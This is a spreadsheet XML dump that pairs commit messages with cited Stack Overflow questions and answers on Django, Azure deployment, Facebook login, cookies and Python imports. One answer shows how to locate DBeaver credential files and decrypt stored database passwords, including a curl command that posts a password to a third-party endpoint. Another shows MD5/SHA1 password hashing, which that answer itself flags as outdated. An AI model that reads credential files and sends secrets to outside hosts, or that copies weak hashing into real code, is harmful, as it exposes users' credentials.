    <t>Add migrations for custom permissions
This feature needs migrations, to add new 'auth.Permission' objects in
the database. Here lies a problem: south does not detect custom permissions
in a model's 'Meta' class. 'schemamigration' does not produce migration
code.
We had to create a custom migration, to create new objects, and a backwards
one to delete them (when migrating backwards).
Reference:
http://stackoverflow.com/questions/1742021/adding-new-custom-permissions-in-django</t>
  </si>
  <si>
    <t>South does not track django.contrib.auth permissions.  See
ticket #211
for more information.
One of the comments on the ticket suggests that using the
--all
option on syncdb may solve the problem.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm at my whit's end right now. I have tried deploying my app to vercel, gcp, azure, digital ocean ect, ect, ect. With no luck. My latest attempt was with azure which is where I've had the most luck.&lt;/p&gt;
&lt;p&gt;To give you context here is my github actions pipeline:&lt;/p&gt;
&lt;pre class="lang-yaml prettyprint-override"&gt;&lt;code&gt;name: Client Application to Azure
on:
  push:
    branches:
      - main
    paths:
      - apps/client/**
      - .github/workflows/client-application-vercel-deployment.yaml
  pull_request:
    paths:
      - apps/client/**
      - .github/workflows/client-application-vercel-deployment.yaml
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version: '18.x'
      - name: Create .env.production in apps/client
        uses: 1arp/create-a-file-action@0.4.5
        with:
          path: 'apps/client'
          file: '.env.production'
          content: |
            POSTGRES_URL=&amp;quot;{{#POSTGRES_URL}}&amp;quot;
            NEXTAUTH_URL=&amp;quot;{{#NEXT_AUTH_URL_CLIENT}}&amp;quot;
            NEXTAUTH_SECRET=&amp;quot;{{#NEXTAUTH_SECRET}}&amp;quot;
            AUTH_GITHUB_ID=&amp;quot;{{#AUTH_GITHUB_ID}}&amp;quot;
            AUTH_GITHUB_SECRET=&amp;quot;{{#AUTH_GITHUB_SECRET}}&amp;quot;
            GOOGLE_CLIENT_ID=&amp;quot;{{#GOOGLE_CLIENT_ID}}&amp;quot;
            GOOGLE_CLIENT_SECRET=&amp;quot;{{#GOOGLE_CLIENT_SECRET}}&amp;quot;
            RESEND_API_KEY=&amp;quot;{{#RESEND_API_KEY}}&amp;quot;
            EMAIL_FROM=&amp;quot;{{#EMAIL_FROM}}&amp;quot;
            STRIPE_SECRETKEY=&amp;quot;{{#STRIPE_SECRETKEY}}&amp;quot;
            STRIPE_WEBHOOK_SECRETKEY=&amp;quot;{{#STRIPE_WEBHOOK_SECRETKEY}}&amp;quot;
            NODE_ENV=&amp;quot;production&amp;quot;
            AUTH_TRUST_HOST=true
      - name: Replace tokens in .env.production
        uses: cschleiden/replace-tokens@v1
        with:
          files: './apps/client/.env.production'
          tokenPrefix: '{{#'
          tokenSuffix: '}}'
        env:
          POSTGRES_URL: ${{ secrets.POSTGRES_URL }}
          NEXT_AUTH_URL_CLIENT: ${{ secrets.NEXT_AUTH_URL_CLIENT }}
          NEXTAUTH_SECRET: ${{ secrets.NEXTAUTH_SECRET }}
          AUTH_GITHUB_ID: ${{ secrets.AUTH_GITHUB_ID }}
          AUTH_GITHUB_SECRET: ${{ secrets.AUTH_GITHUB_SECRET }}
          GOOGLE_CLIENT_ID: ${{ secrets.GOOGLE_CLIENT_ID }}
          GOOGLE_CLIENT_SECRET: ${{ secrets.GOOGLE_CLIENT_SECRET }}
          RESEND_API_KEY: ${{ secrets.RESEND_API_KEY }}
          EMAIL_FROM: ${{ secrets.EMAIL_FROM }}
          STRIPE_SECRETKEY: ${{ secrets.STRIPE_SECRETKEY }}
          STRIPE_WEBHOOK_SECRETKEY: ${{ secrets.STRIPE_WEBHOOK_SECRETKEY }}
      - name: Install dependencies and build
        run: |
          yarn install --force
          cd apps/client
          yarn build
      - name: Prepare standalone folder
        run: |
          cd apps/client
          mkdir -p ../../build/client/standalone
          cp -r .next/standalone/apps/client/{.,}* ../../build/client/standalone
          cp -r .next/standalone/node_modules ../../build/client/standalone/node_modules
          cp -r ./public ../../build/client/standalone
          mkdir -p ../../build/client/standalone/public/_next
          cp -r .next/static ../../build/client/standalone/public/_next
      - name: Zip Archive
        run: cd build/client/standalone &amp;amp;&amp;amp; zip ../build.zip ./* .next -qr
      - name: Upload artifact for deployment job
        uses: actions/upload-artifact@v4
        with:
          name: crosspost-client-app
          path: build/client/build.zip
  deploy:
    runs-on: ubuntu-latest
    needs: build
    environment:
      name: 'Production'
    steps:
      - name: Download artifact from build job
        uses: actions/download-artifact@v4
        with:
          name: crosspost-client-app
      - name: Unzip artifact for deployment
        run: unzip build.zip
      - name: 'Deploy to Azure Web App'
        id: deploy-to-webapp
        uses: azure/webapps-deploy@v3
        with:
          app-name: ${{ secrets.AZURE_CLIENTAPP_NAME }} 
          slot-name: 'Production'
          package: build.zip
          publish-profile: ${{ secrets.AZURE_CLIENTAPP_PUBLISH_PROFILE }}
      # # Step 8: Deploy to Azure App Service
      # - name: Deploy to Azure Web App
      #   uses: azure/webapps-deploy@v2
      #   with:
      #     app-name: ${{ secrets.AZURE_CLIENTAPP_NAME }} 
      #     publish-profile: ${{ secrets.AZURE_CLIENTAPP_PUBLISH_PROFILE }}
      #     package: build/client/build.zip
      - name: Log in to Azure
        uses: azure/login@v2
        with:
          creds: ${{ secrets.AZURE_CREDENTIALS }}
      - name: Configure Azure App Service
        uses: azure/CLI@v1
        with:
          azcliversion: 2.48.0 # Ensure a recent version of Azure CLI is used
          inlineScript: |
            az webapp config set --resource-group ${{ secrets.AZURE_CROSSPOST_PRD_RG_NAME }} --name ${{ secrets.AZURE_CLIENTAPP_NAME }} --startup-file &amp;quot;node ./server.js&amp;quot;
            az webapp config set --resource-group ${{ secrets.AZURE_CROSSPOST_PRD_RG_NAME }} --name ${{ secrets.AZURE_CLIENTAPP_NAME }} --linux-fx-version &amp;quot;NODE|18-lts&amp;quot;
            az webapp config appsettings set --resource-group ${{ secrets.AZURE_CROSSPOST_PRD_RG_NAME }} --name ${{ secrets.AZURE_CLIENTAPP_NAME }} --settings \
              POSTGRES_URL=&amp;quot;${{ secrets.POSTGRES_URL }}&amp;quot; \
              NEXTAUTH_URL=&amp;quot;${{ secrets.NEXT_AUTH_URL_CLIENT }}&amp;quot; \
              NEXTAUTH_SECRET=&amp;quot;${{ secrets.NEXTAUTH_SECRET }}&amp;quot; \
              AUTH_GITHUB_ID=&amp;quot;${{ secrets.AUTH_GITHUB_ID }}&amp;quot; \
              AUTH_GITHUB_SECRET=&amp;quot;${{ secrets.AUTH_GITHUB_SECRET }}&amp;quot; \
              GOOGLE_CLIENT_ID=&amp;quot;${{ secrets.GOOGLE_CLIENT_ID }}&amp;quot; \
              GOOGLE_CLIENT_SECRET=&amp;quot;${{ secrets.GOOGLE_CLIENT_SECRET }}&amp;quot; \
              RESEND_API_KEY=&amp;quot;${{ secrets.RESEND_API_KEY }}&amp;quot; \
              EMAIL_FROM=&amp;quot;${{ secrets.EMAIL_FROM }}&amp;quot; \
              STRIPE_SECRETKEY=&amp;quot;${{ secrets.STRIPE_SECRETKEY }}&amp;quot; \
              STRIPE_WEBHOOK_SECRETKEY=&amp;quot;${{ secrets.STRIPE_WEBHOOK_SECRETKEY }}&amp;quot;
              NODE_ENV=&amp;quot;production&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The reason step 6 is a it of a mess its moving files into a clean build folder to unturbo repo the internals as it gets folder paths like apps/client inside the standalone folder that next outputs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Next.config.js&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export default {
  reactStrictMode: true,
  output: 'standalone',
  images: {
    remotePatterns: [
      {
        protocol: 'https',
        hostname: 'avatars.githubusercontent.com',
        pathname: '/**',
      },
      {
        protocol: 'https',
        hostname: '*.public.blob.vercel-storage.com',
        pathname: '/**',
      },
      {
        protocol: 'https',
        hostname: 'lh3.googleusercontent.com',
        pathname: '/**',
      },
      {
        protocol: 'https',
        hostname: 'images.unsplash.com',
        pathname: '/**',
      }
    ]
  }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;name&amp;quot;: &amp;quot;client&amp;quot;,
  &amp;quot;version&amp;quot;: &amp;quot;1.0.0&amp;quot;,
  &amp;quot;private&amp;quot;: true,
  &amp;quot;scripts&amp;quot;: {
    &amp;quot;dev&amp;quot;: &amp;quot;next dev --turbopack&amp;quot;,
    &amp;quot;build&amp;quot;: &amp;quot;next build&amp;quot;,
    &amp;quot;docker:build&amp;quot;: &amp;quot;docker build . -t ghcr.io/CMarshall92/crosspost-application-image:latest&amp;quot;,
    &amp;quot;start&amp;quot;: &amp;quot;next start&amp;quot;,
    &amp;quot;db:generate&amp;quot;: &amp;quot;drizzle-kit generate:pg --schema ./db/schema.ts --out=./db/migrations&amp;quot;,
    &amp;quot;db:migrate&amp;quot;: &amp;quot;tsx ./db/migrate.ts&amp;quot;,
    &amp;quot;db:seed&amp;quot;: &amp;quot;tsx ./db/seed.ts&amp;quot;,
    &amp;quot;stripe&amp;quot;: &amp;quot;../stripe.exe login &amp;amp;&amp;amp; ../stripe.exe listen --forward-to localhost:3000/api/webhooks/stripe&amp;quot;
  },
  &amp;quot;dependencies&amp;quot;: {
    &amp;quot;@hookform/resolvers&amp;quot;: &amp;quot;^4.0.0&amp;quot;,
    &amp;quot;@neondatabase/serverless&amp;quot;: &amp;quot;^0.8.1&amp;quot;,
    &amp;quot;@radix-ui/react-dialog&amp;quot;: &amp;quot;^1.1.4&amp;quot;,
    &amp;quot;@radix-ui/react-dropdown-menu&amp;quot;: &amp;quot;^2.1.4&amp;quot;,
    &amp;quot;@radix-ui/react-label&amp;quot;: &amp;quot;^2.1.2&amp;quot;,
    &amp;quot;@radix-ui/react-slot&amp;quot;: &amp;quot;^1.1.1&amp;quot;,
    &amp;quot;@radix-ui/react-tabs&amp;quot;: &amp;quot;^1.1.2&amp;quot;,
    &amp;quot;@radix-ui/react-tooltip&amp;quot;: &amp;quot;^1.1.6&amp;quot;,
    &amp;quot;@react-email/button&amp;quot;: &amp;quot;0.0.15&amp;quot;,
    &amp;quot;@react-email/components&amp;quot;: &amp;quot;0.0.21&amp;quot;,
    &amp;quot;@react-email/html&amp;quot;: &amp;quot;0.0.8&amp;quot;,
    &amp;quot;@types/node&amp;quot;: &amp;quot;20.17.6&amp;quot;,
    &amp;quot;@types/react&amp;quot;: &amp;quot;19.0.0&amp;quot;,
    &amp;quot;@types/react-dom&amp;quot;: &amp;quot;19.0.0&amp;quot;,
    &amp;quot;@vercel/analytics&amp;quot;: &amp;quot;^1.4.1&amp;quot;,
    &amp;quot;autoprefixer&amp;quot;: &amp;quot;^10.4.20&amp;quot;,
    &amp;quot;class-variance-authority&amp;quot;: &amp;quot;^0.7.1&amp;quot;,
    &amp;quot;clsx&amp;quot;: &amp;quot;^2.1.1&amp;quot;,
    &amp;quot;drizzle-orm&amp;quot;: &amp;quot;^0.29.5&amp;quot;,
    &amp;quot;drizzle-zod&amp;quot;: &amp;quot;^0.5.1&amp;quot;,
    &amp;quot;input-otp&amp;quot;: &amp;quot;^1.4.2&amp;quot;,
    &amp;quot;lucide-react&amp;quot;: &amp;quot;^0.400.0&amp;quot;,
    &amp;quot;nanoid&amp;quot;: &amp;quot;^5.0.9&amp;quot;,
    &amp;quot;next&amp;quot;: &amp;quot;15.1.3&amp;quot;,
    &amp;quot;next-auth&amp;quot;: &amp;quot;5.0.0-beta.25&amp;quot;,
    &amp;quot;postcss&amp;quot;: &amp;quot;^8.4.49&amp;quot;,
    &amp;quot;prettier&amp;quot;: &amp;quot;^3.4.2&amp;quot;,
    &amp;quot;prop-types&amp;quot;: &amp;quot;^15.8.1&amp;quot;,
    &amp;quot;react&amp;quot;: &amp;quot;19.0.0&amp;quot;,
    &amp;quot;react-dom&amp;quot;: &amp;quot;19.0.0&amp;quot;,
    &amp;quot;react-hook-form&amp;quot;: &amp;quot;^7.54.2&amp;quot;,
    &amp;quot;resend&amp;quot;: &amp;quot;^3.5.0&amp;quot;,
    &amp;quot;server-only&amp;quot;: &amp;quot;^0.0.1&amp;quot;,
    &amp;quot;sharp&amp;quot;: &amp;quot;^0.33.5&amp;quot;,
    &amp;quot;sonner&amp;quot;: &amp;quot;^1.7.4&amp;quot;,
    &amp;quot;stripe&amp;quot;: &amp;quot;^17.6.0&amp;quot;,
    &amp;quot;tailwind-merge&amp;quot;: &amp;quot;^2.6.0&amp;quot;,
    &amp;quot;tailwindcss&amp;quot;: &amp;quot;^3.4.17&amp;quot;,
    &amp;quot;tailwindcss-animate&amp;quot;: &amp;quot;^1.0.7&amp;quot;,
    &amp;quot;typescript&amp;quot;: &amp;quot;5.7.2&amp;quot;,
    &amp;quot;zod&amp;quot;: &amp;quot;^3.24.1&amp;quot;
  },
  &amp;quot;prettier&amp;quot;: {
    &amp;quot;arrowParens&amp;quot;: &amp;quot;always&amp;quot;,
    &amp;quot;singleQuote&amp;quot;: true,
    &amp;quot;tabWidth&amp;quot;: 2,
    &amp;quot;trailingComma&amp;quot;: &amp;quot;none&amp;quot;
  },
  &amp;quot;packageManager&amp;quot;: &amp;quot;yarn@1.22.22&amp;quot;,
  &amp;quot;devDependencies&amp;quot;: {
    &amp;quot;dotenv&amp;quot;: &amp;quot;^16.4.7&amp;quot;,
    &amp;quot;drizzle-kit&amp;quot;: &amp;quot;^0.20.18&amp;quot;,
    &amp;quot;tsx&amp;quot;: &amp;quot;^4.19.2&amp;quot;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I run the commands the build agent runs ie step 5 and 6 locally i get a clean build folder output at the root of the project as intended, i e the following image&lt;br /&gt;
&lt;a href="https://i.sstatic.net/rfmMimkZ.png" rel="nofollow noreferrer"&gt;Local Build Output&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When I then run the following form the root of the project&lt;/p&gt;
&lt;p&gt;&lt;code&gt;cd build/client/standalone &amp;amp;&amp;amp; node server.js&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The project launches and when I go to the url in the browser I get the following&lt;br /&gt;
&lt;a href="https://i.sstatic.net/Wx1F9Ebw.png" rel="nofollow noreferrer"&gt;Console Runner Running&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://i.sstatic.net/bmpdTwmU.png" rel="nofollow noreferrer"&gt;Website running fine locally&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;So at this point its safe to assume the builds working fine and what the pipeline is doing command wise to generate this build folder should be working as expected. **Only difference is build agent is running ubuntu-latest and im running those commands on windows.&lt;br /&gt;
**&lt;br /&gt;
Anyways now its time to push to azure, everything in the scm wwwroot folder looks fine however when its published via the pipeline im getting the following when deployed.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/YELEekx7.png" rel="nofollow noreferrer"&gt;Website running on linux agent in azure and this is the output&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The odd thing is if i deploy the build folder i generated locally with azures ftp solution via filezilla everything works there. so something is happening explicitly with the pipeline thats making this fail.&lt;/p&gt;
&lt;p&gt;I am just about to try swap for a windows build agent and will update you with what i find. Any help would be greatly appreciated at this point.&lt;/p&gt;
&lt;p&gt;Everything is listed in the main description in terms of things ive tried.&lt;/p&gt;
&lt;p&gt;I will short form list things here though&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Deployed to multiple cloud platforms&lt;/li&gt;
&lt;li&gt;Used Docker&lt;/li&gt;
&lt;li&gt;Pushed using FTP rather than the pipeline and it works&lt;/li&gt;
&lt;li&gt;Tried zipping all artifacts and deploying a zip file&lt;/li&gt;
&lt;li&gt;Tried just pushing the build folder direct&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C62</t>
  </si>
  <si>
    <t>Facebook login success
https://developers.facebook.com/docs/facebook-login
http://stackoverflow.com/questions/29295987/android-facebook-4-0-sdk-how-to-get-email-date-of-birth-and-gender-of-user</t>
  </si>
  <si>
    <t>That's not the right way to set the permissions as you are overwriting them with each method call.
Replace this:
mButtonLogin.setReadPermissions("user_friends");
mButtonLogin.setReadPermissions("public_profile");
mButtonLogin.setReadPermissions("email");
mButtonLogin.setReadPermissions("user_birthday");
With the following, as the method
setReadPermissions()
accepts an ArrayList:
loginButton.setReadPermissions(Arrays.asList(
        "public_profile", "email", "user_birthday", "user_friends"));
Also here is how to query extra data GraphRequest:
private LoginButton loginButton;
private CallbackManager callbackManager;
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_login);
    loginButton = (LoginButton) findViewById(R.id.login_button);
    loginButton.setReadPermissions(Arrays.asList(
            "public_profile", "email", "user_birthday", "user_friends"));
    callbackManager = CallbackManager.Factory.create();
    // Callback registration
    loginButton.registerCallback(callbackManager, new FacebookCallback&lt;LoginResult&gt;() {
        @Override
        public void onSuccess(LoginResult loginResult) {
            // App code
            GraphRequest request = GraphRequest.newMeRequest(
                    loginResult.getAccessToken(),
                    new GraphRequest.GraphJSONObjectCallback() {
                        @Override
                        public void onCompleted(JSONObject object, GraphResponse response) {
                            Log.v("LoginActivity", response.toString());
                            // Application code
                            String email = object.getString("email");
                            String birthday = object.getString("birthday"); // 01/31/1980 format
                        }
                    });
            Bundle parameters = new Bundle();
            parameters.putString("fields", "id,name,email,gender,birthday");
            request.setParameters(parameters);
            request.executeAsync();
        }
        @Override
        public void onCancel() {
            // App code
            Log.v("LoginActivity", "cancel");
        }
        @Override
        public void onError(FacebookException exception) {
            // App code
            Log.v("LoginActivity", exception.getCause().toString());
        }
    });
}
EDIT:
One possible problem is that Facebook assumes that your email is invalid. To test it, use the
Graph API Explorer
and try to get it. If even there you can't get your email, change it in your profile settings and try again. This approach resolved this issue for some developers commenting my answer.</t>
  </si>
  <si>
    <t xml:space="preserve">I like the idea of having Interfaces and Implementation separate.  But how separate?  Are the Interface definitions in a separate .Net assembly?  Do you have a single project that defines all Interfaces for a solution?  Otherwise are there issues with circular dependencies of Interfaces?
</t>
  </si>
  <si>
    <t>C620</t>
  </si>
  <si>
    <t>Add DBeaver default JSON credentials file
Based on https://dbeaver.com/docs/wiki/Project-security/ and https://stackoverflow.com/questions/39928401/recover-db-password-stored-in-my-dbeaver-connection</t>
  </si>
  <si>
    <t>For newer DBeaver ( 6.1.3+ )
The credential file is located
~/Library/DBeaverData/workspace6/General/.dbeaver/credentials-config.json
(I was on Mac). I put together a javascript function here
https://www.bugdays.com/dbeaver-password-decrypter
to decrypt it. Go there and select credentials-config.json file, bugdays will decrypt it and display it. Its purely within client side, there is no server uploading (However its a risky practice)
Pre- DBeaver 6.1.3
Follow these steps (My DBeaver version was 3.5.8 and it was on Mac OsX El Capitan)
Locate the file in which DBeaver stores the connection details. For me, it was in this location
~/.dbeaver/General/.dbeaver-data-sources.xml
. This file is hidden, so keep that in mind when you look for it.
Locate your interested Datasource Definition node in that file.
Decrypt the password:
Unfortunately, everything is in plain text except password; Password is in some kind of Encrypted form. Decrypt it to plain-text using this
tool
.
Original Answer
I put together a quick and dirty
Java program
by copying core of DBeaver's method for decrypting the password.  Once you have the Encrypted password string, just execute this program, it will convert the password to plain text and prints it
How to run it
On Line Number 13, just replace
OwEKLE4jpQ==
with whatever encrypted password you are finding in
.dbeaver-data-sources.xml
file for your interested datasource. Compile it and run it, it will print the plain-text password.
https://github.com/jaisonpjohn/dbeaver-password-retriever/blob/master/SimpleStringEncrypter.java
Apparently, this is a "Popular" mistake. So I have deployed an AWS lambda function with the aforementioned code. Use this at your own risk, you will never know whether I am logging your password or not
curl https://lmqm83ysii.execute-api.us-west-2.amazonaws.com/prod/dbeaver-password-decrypter \
-X POST --data "OwEKLE4jpQ=="
Even better, here is the UI:
https://bugdays.com/dbeaver-password-decrypter
. This goes without saying, use this at your own risk</t>
  </si>
  <si>
    <t xml:space="preserve">I have an MVC architecture and since I already have an action that would be extra useful if automatically called every hour or so, I wondered if there's a way to set it up as a cron job?
</t>
  </si>
  <si>
    <t>C621</t>
  </si>
  <si>
    <t>[NEW] Crypto password
Will crypt a password and allow me to verify it.
From https://stackoverflow.com/questions/4181198/how-to-hash-a-password/10402129#10402129</t>
  </si>
  <si>
    <t>UPDATE
:
THIS ANSWER IS SERIOUSLY OUTDATED
. Please use the recommendations from
https://stackoverflow.com/a/10402129
or
https://stackoverflow.com/a/73125177
instead.
You can either use
var md5 = new MD5CryptoServiceProvider();
var md5data = md5.ComputeHash(data);
or
var sha1 = new SHA1CryptoServiceProvider();
var sha1data = sha1.ComputeHash(data);
To get
data
as byte array you could use
var data = Encoding.ASCII.GetBytes(password);
and to get back string from
md5data
or
sha1data
var hashedPassword = ASCIIEncoding.GetString(md5data);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A website using payment gateway requires Samesite as None  to continue session for users returning from payment gateway to website. In other pages of website Samesite should be Lax or strict to protect from CSRF attack.&lt;/p&gt;
&lt;p&gt;Let's say the website has following payment pages.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;checkout_pay.php&lt;/em&gt;: it shows order confirmation before user is proceeding for payment&lt;/li&gt;
&lt;li&gt;&lt;em&gt;checkout_response.php&lt;/em&gt;: it shows if payment transaction was successful&lt;/li&gt;
&lt;li&gt;&lt;em&gt;checkout_fail.php&lt;/em&gt;: it shows if transaction failed&lt;/li&gt;
&lt;li&gt;&lt;em&gt;checkout_cancel.php&lt;/em&gt;: it shows if transaction was cancelled&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These are some queries that I have in this regard.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Is it possible to set different values for Samesite in different pages?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Can Samesite be set None for above four payment pages and set Lax for other pages, admin section by using &lt;code&gt;session_set_cookie_params()&lt;/code&gt;?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Whether Samesite cookie life-time be set separately for different pages? (The &lt;code&gt;session.cookie_lifetime&lt;/code&gt; already set to two days)&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>C622</t>
  </si>
  <si>
    <t>Update reset password page
It was using an outdated api to get the reset token, and was not
allowing users to reset their password.
http://stackoverflow.com/questions/18661663/upgrading-to-devise-3-1-getting-reset-password-token-is-invalid</t>
  </si>
  <si>
    <t>You commented on
my similar question
a bit ago, and I found an answer that might help you as well.
Upgrading to Devise 3.1.0 left some 'cruft' in a view that I hadn't touched in a while. According to
this blog post
, you need to change your Devise mailer to use
@token
instead of the old
@resource.confirmation_token
.
Find this in
app/views/&lt;user&gt;/mailer/reset_password_instructions.html.erb
and change it to something like:
&lt;p&gt;Hello &lt;%= @resource.email %&gt;!&lt;/p&gt;
&lt;p&gt;Someone has requested a link to change your password, and you can do this through the link below.&lt;/p&gt;
&lt;p&gt;&lt;%= link_to 'Change my password', edit_password_url(@resource, :reset_password_token =&gt; @token) %&gt;&lt;/p&gt;
&lt;p&gt;If you didn't request this, please ignore this email.&lt;/p&gt;
&lt;p&gt;Your password won't change until you access the link above and create a new one.&lt;/p&gt;
This should fix any token-based confirmation problems you're having. This is likely to fix any unlock or confirmation token problems as well.</t>
  </si>
  <si>
    <t xml:space="preserve">I've used PerlNet for a data extraction project. Perl is a powerful language for extracting data and text manipulation with a huge CPAN module. However, my program need some kind of UI, thread... which I decided to use .NET C#. With Perl Dev Kit, we have an option to wrap an Perl module to a .NET DLL and use this DLL directly from C#.
Everything was ok but I have one question about PerlNet architecture. As far as I know, PerlNet was a research project between ActiveState and Microsoft for running Perl code in .NET but I did not find any document for this. 
What is limitation of PerlNet? How was PerlNet constructed? 
Thanks,
Minh.
</t>
  </si>
  <si>
    <t>C623</t>
  </si>
  <si>
    <t>Fixed: arbitrary/inconsistent decrypt results, with unicode
- Long story short, see: http://stackoverflow.com/questions/42459487/encode-and-decode-a-string-with-password-and-salt-in-dotnet-core</t>
  </si>
  <si>
    <t>Your problem has nothing to do with cryptography and instead is caused by this pair of functions
private static byte[] ToByteArray(string input)
{
    return Encoding.Unicode.GetBytes(input);
}
private static string ToString(byte[] input)
{
    return Encoding.Unicode.GetString(input);
}
You are not allowed to call
GetString
on arbitrary byte arrays, you will cause a loss of information if you do. You need to use a encoding that allows for arbitrary byte arrays, for example Base64:
private static byte[] ToByteArray(string input)
{
    return Convert.FromBase64String(input);
}
private static string ToString(byte[] input)
{
    return Convert.ToBase64String(input);
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to recreate a simulator from a research paper but I can't get my code to match up with the simulator.&lt;/p&gt;
&lt;p&gt;Here is the code I am using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dde_system &amp;lt;- function(t, state, parms) {
  with(as.list(c(state, parms)), {
    # Retrieve past values safely
    if (t - tau_delay &amp;gt;= 0) {
      N_tau &amp;lt;- lagvalue(t - tau_delay, 2)
      P_tau &amp;lt;- lagvalue(t - tau_delay, 4)
    } else {
      N_tau &amp;lt;- 0
      P_tau &amp;lt;- 0
    }
    # Growth rate calculation
    mu &amp;lt;- mu_max(T = 30, pH = 7, parms)  # Example fixed T and pH
    # Differential equations
    dR &amp;lt;- omega * (R0 - R) - (eps * mu * R * (N + M)) / (k + R)
    dN &amp;lt;- ((mu*R*N)/(k+R)) - delta * N* P - (omega * N)
    dM &amp;lt;- delta * N * P - delta * N_tau * P_tau * exp(-omega * tau_delay) - omega * M
    dP &amp;lt;- beta * delta * N_tau * P_tau * exp(-omega * tau_delay) - delta * N * P - delta * M * P - omega * P
    print(N)
    return(list(c(dR, dN, dM, dP)))
  })
}
library(deSolve)
y &amp;lt;- c(R = 0.5, N =6e7, M = 0, P = 6e7)
times &amp;lt;- seq(0, 48, by = 0.1)
sol &amp;lt;- dede(y = y, times = times, func = dde_system, parms = params)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The simulator produces a sinusoidal graph shrinking to an equilibrium point while my code produces a graph that just goes to zero and at this point I don't know what to do anymore.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://doi.org/10.1016/j.mbs.2016.06.009" rel="nofollow noreferrer"&gt;Link to paper&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://dublin.embnet.sk:3838/model/" rel="nofollow noreferrer"&gt;Link to website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C624</t>
  </si>
  <si>
    <t>Modify project structure to allow parent dir imports
The reason for this change is so that I can reuse common data structure classes across different problems. The new project structure and method for importing across problem directories was taken from this [question](https://stackoverflow.com/questions/6323860/sibling-package-imports/50193944#50193944).</t>
  </si>
  <si>
    <t>Seven years after
Since I wrote the answer below, modifying
sys.path
is still a quick-and-dirty trick that works well for private scripts, but there has been several improvements
Installing
the package (in a virtualenv or not) will give you what you want, though I would suggest using pip to do it rather than using setuptools directly (and using
setup.cfg
to store the metadata)
Using the
-m
flag
and running as a package works too (but will turn out a bit awkward if you want to convert your working directory into an installable package).
For the tests, specifically,
pytest
is able to find the api package in this situation and takes care of the
sys.path
hacks for you
So it really depends on what you want to do. In your case, though, since it seems that your goal is to make a proper package at some point, installing through
pip -e
is probably your best bet, even if it is not perfect yet.
Old answer
As already stated elsewhere, the awful truth is that you have to do ugly hacks to allow imports from siblings modules or parents package from a
__main__
module. The issue is detailed in
PEP 366
.
PEP 3122
attempted to handle imports in a more rational way but Guido has rejected it one the account of
The only use case seems to be running scripts that happen
  to be living inside a module's directory, which I've always seen as an
  antipattern.
(
here
)
Though, I use this pattern on a regular basis with
# Ugly hack to allow absolute import from the root folder
# whatever its name is. Please forgive the heresy.
if __name__ == "__main__" and __package__ is None:
    from sys import path
    from os.path import dirname as dir
    path.append(dir(path[0]))
    __package__ = "examples"
import api
Here
path[0]
is your running script's parent folder and
dir(path[0])
your top level folder.
I have still not been able to use relative imports with this, though, but it does allow absolute imports from the top level (in your example
api
's parent folder).</t>
  </si>
  <si>
    <t xml:space="preserve">This question stems from watching [external-link]. This question and his talk have nothing specifically to do with Drupal, by the way... it was just given at their con. My own question also has nothing specific to do with PHP. It is the single entry point in general that I am curious about.
These days it seems that most frameworks offer a single entry point for whatever you build with them. In his talk Rasmus mentions that he thinks this is bad. It seems to me that he would be correct in this thinking. If everyone hitting the site is coming in through the same entry point wouldn't things bog down after traffic reached a certain point? Wouldn't it  be more efficient to allow people direct access to specific points in a site without having their request go through the same point? But perhaps the actual impact is not very bad? Maybe modern architecture can handle it? Maybe you have to be truly gigantic in scale before it becomes even worth considering? I'm curious as to what people on this site think about this issue.
</t>
  </si>
  <si>
    <t>C625</t>
  </si>
  <si>
    <t>Fixed bug: last_login will not change if user is using social or not 
verified.
Reference:
https://docs.djangoproject.com/en/4.0/ref/models/fields/#datefield
https://stackoverflow.com/questions/1737017/django-auto-now-and-auto-now-add</t>
  </si>
  <si>
    <t>Any field with the
auto_now
attribute set will also inherit
editable=False
and therefore will not show up in the admin panel. There has been talk in the past about making the
auto_now
and
auto_now_add
arguments go away, and although they still exist, I feel you're better off just using a
custom
save()
method
.
So, to make this work properly, I would recommend not using
auto_now
or
auto_now_add
and instead  define your own
save()
method to make sure that
created
is only updated if
id
is not set (such as when the item is first created), and have it update
modified
every time the item is saved.
I have done the exact same thing with other projects I have written using Django, and so your
save()
would look like this:
from django.utils import timezone
class User(models.Model):
    created     = models.DateTimeField(editable=False)
    modified    = models.DateTimeField()
    def save(self, *args, **kwargs):
        ''' On save, update timestamps '''
        if not self.id:
            self.created = timezone.now()
        self.modified = timezone.now()
        return super(User, self).save(*args, **kwargs)
Edit in response to comments:
The reason why I just stick with overloading
save()
